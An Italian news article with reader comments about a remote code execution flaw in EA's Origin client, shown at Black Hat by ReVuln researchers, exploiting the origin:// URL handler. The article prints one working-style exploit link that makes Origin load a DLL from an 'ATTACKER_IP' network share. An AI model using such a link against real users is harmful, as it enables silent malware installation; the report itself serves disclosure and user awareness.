Vulnerabilità Origin consente l'esecuzione di codice da remoto

Vulnerabilità Origin consente l'esecuzione di codice da remoto

Si tratta di un rischio exploit simile a quello rivenuto nel caso di Steam nello scorso ottobre.

di Rosario Grasso pubblicata il , alle 14:01 nel canale Videogames
Steam
 

Gli oltre 40 milioni di utenti di Origin potrebbero essere a rischio secondo le ricerche di un gruppo di programmatori italiani, che operano sotto l'etichetta ReVuln. La piattaforma di gioco online di Electronic Arts, infatti, consentirebbe a malintenzionati di eseguire codice sui computer dei giocatori in modalità remota.

Origin

L'attacco è stato dimostrato venerdì scorso in occasione della conferenza sulla sicurezza Black Hat che si è svolta ad Amsterdam. Servono pochi secondi per portare a termine la procedura e in alcuni casi non è necessaria alcuna interazione da parte delle vittime. L'attacco è basato sulla manipolazione del protocollo URL che viene utilizzato per l'avvio automatico dei giochi sui PC o sui Mac.

Sfruttando i difetti nell'applicazione Origin, sia nella sua variante Mac che in quella PC, quest'ultima può essere trasformata in uno strumento per attaccare gli utenti e installare silenziosamente malware sui computer di questi ultimi.

"La piattaforma Origin consente agli utenti malintenzionati di sfruttare le vulnerabilità locali attraverso il meccanismo di gestione degli URL", sostengono Donato Ferrante e Luigi Auriemma, i due ricercatori di ReVuln. "Un utente malitenzionato potrebbe creare un collegamento internet in modo da eseguire codice dannoso in modalità remota sul computer della vittima che ha installato Origin".

Ad Amsterdam, i due ricercatori hanno mostrato una demo in cui si vede come sia possibile eseguire codice da remoto su un computer con Origin e Crysis 3 installati. La piattaforma EA usa il link origin://LaunchGame/71503 per l'attivazione del gioco, ma anche gli utenti possono clickare su link come origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll. Nella demo si vedeva come in questo caso il client Origin caricasse una libreria a collegamento dinamico di Windows sul computer della vittima.

Electronic Arts, secondo quanto riporta Ars Technica, ha già inoltrato un comunicato ufficiale sulla faccenda. "Il nostro team indaga costantemente su problematiche come questa e aggiorniamo senza soluzione di continuità la nostra infrastruttura di sicurezza", è la posizione ufficiale di EA.

Si tratta di un attacco molto simile a quello dimostrato dagli stessi ricercatori nel caso di Steam. I due di ReVuln dimostravano come la piattaforma digitale di Valve fosse a rischio exploit per via del modo in cui gestisce il protocollo URL "steam://".

Grazie a protocolli di questo tipo si possono raggiungere delle pagine web in cui attivare un gioco o accedere a una particolare promozione, oppure per scaricare tool, leggere news, controllare i profili di altri giocatori. Ma con lo stesso sistema vengono gestiti altri tipi di comandi, come l'installazione e la disinstallazione dei giochi, la connessione ai server di gioco, l'esecuzione di un gioco.

In quell'occasione, i due ricercatori consigliavano agli utenti di disabilitare l'avvio automatico tramite gli URL "steam://". L'attacco attraverso Origin funziona, dunque, in modo molto simile, sfruttando la funzionalità che consente tramite web di avviare i giochi da remoto. Il comando che normalmente serve per avviare un gioco, infatti, può essere modificato al fine di indurre il PC a installare un programma dannoso.

Quando un link origin:// viene lanciato per la prima volta su un computer, i browser web tipicamente chiedono all'utente se vuole lanciare effettivamente il client Origin associato a quel tipo di link. I vari browser gestiscono in maniera differente questa operazione: alcuni mostrano all'utente il percorso web completo, mentre altri ne rivelano solamente una parte. Se l'utente conferma questo tipo di comportamento per il suo PC, allora tutti i link di quel tipo lanceranno la piattaforma Origin. In questo caso quell'utente non potrà più essere protetto da eventuali attacchi da remoto, e non serviranno ulteriori interazioni affinché avvenga la penetrazione di codice dannoso sul sistema. Gli utenti che vogliono mantenere un elevato livello di protezione dovrebbero invece assicurarsi che il sistema notifichi sempre del tentativo di lancio di un software associato a un URL di questo tipo.

8 Commenti
Gli autori dei commenti, e non la redazione, sono responsabili dei contenuti da loro inseriti - info
Gabro_8219 Marzo 2013, 14:41 #1
Ottimo, proprio ieri che ho camprato vari giochi in sconto su origin!
marlboro52819 Marzo 2013, 14:59 #2
quindi?che si deve fare? a me avvia solo battlefield 3 da browser web.gli altri si avviano da software origin..
demon7719 Marzo 2013, 15:17 #3
Che vuoi che si faccia.. si aspetta una patch al più presto e se possibile si evita di lasciare origin attaccato tutto il giorono..
Hulk910319 Marzo 2013, 15:32 #4
Originariamente inviato da: demon77
Che vuoi che si faccia.. si aspetta una patch al più presto e se possibile si evita di lasciare origin attaccato tutto il giorono..


Guarda che non cambia nulla, l'unico modo è disinstallarlo, ti spiego il perchè: anche se è in background probabilmente l'url come succede anche per skype, email, steam ecc ecc... ti apre il programma anche se chiuso e ti esegue in ogni caso il codice.

Quindi le alternative sono: 1) o disinstalli finchè non patchano 2) si stà attenti a dove si preme che è in ogni caso e sempre la miglior soluzione.

In ogni caso è un codice che si esegue SOLO premendolo, come il 90% dei virus, quindi no-click no-malware
Fos19 Marzo 2013, 19:27 #5
Originariamente inviato da: Hulk9103
Guarda che non cambia nulla, l'unico modo è disinstallarlo, ti spiego il perchè: anche se è in background probabilmente l'url come succede anche per skype, email, steam ecc ecc... ti apre il programma anche se chiuso e ti esegue in ogni caso il codice.

Quindi le alternative sono: 1) o disinstalli finchè non patchano 2) si stà attenti a dove si preme che è in ogni caso e sempre la miglior soluzione.

In ogni caso è un codice che si esegue SOLO premendolo, come il 90% dei virus, quindi no-click no-malware
Beh, se è così, sarebbe sufficiente rinominare l'eseguibile, o magari archiviarlo con WinRAR (o ecquivalente), cancellarlo, per poi ripristinarlo a patch uscita.
Hulk910319 Marzo 2013, 19:39 #6
Originariamente inviato da: Fos
Beh, se è così, sarebbe sufficiente rinominare l'eseguibile, o magari archiviarlo con WinRAR (o ecquivalente), cancellarlo, per poi ripristinarlo a patch uscita.


Anche, l'importante è far sparire in qualche modo la matrice ovvero Origin.exe
Nemesi1819 Marzo 2013, 21:04 #7
Non ne sono sicuro al 100% ma forse si può limitare il problema eseguendo origin in sandbox usando programmi tipo sandobxie.
Mc®.Turbo-Line19 Marzo 2013, 21:31 #8
La patch mi sa che e' uscita, stasera Origin mi ha scaricato la versione aggiornata

Devi effettuare il login per poter commentare
Se non sei ancora registrato, puoi farlo attraverso questo form.
Se sei già registrato e loggato nel sito, puoi inserire il tuo commento.
Si tenga presente quanto letto nel regolamento, nel rispetto del "quieto vivere".

La discussione è consultabile anche qui, sul forum.
 
^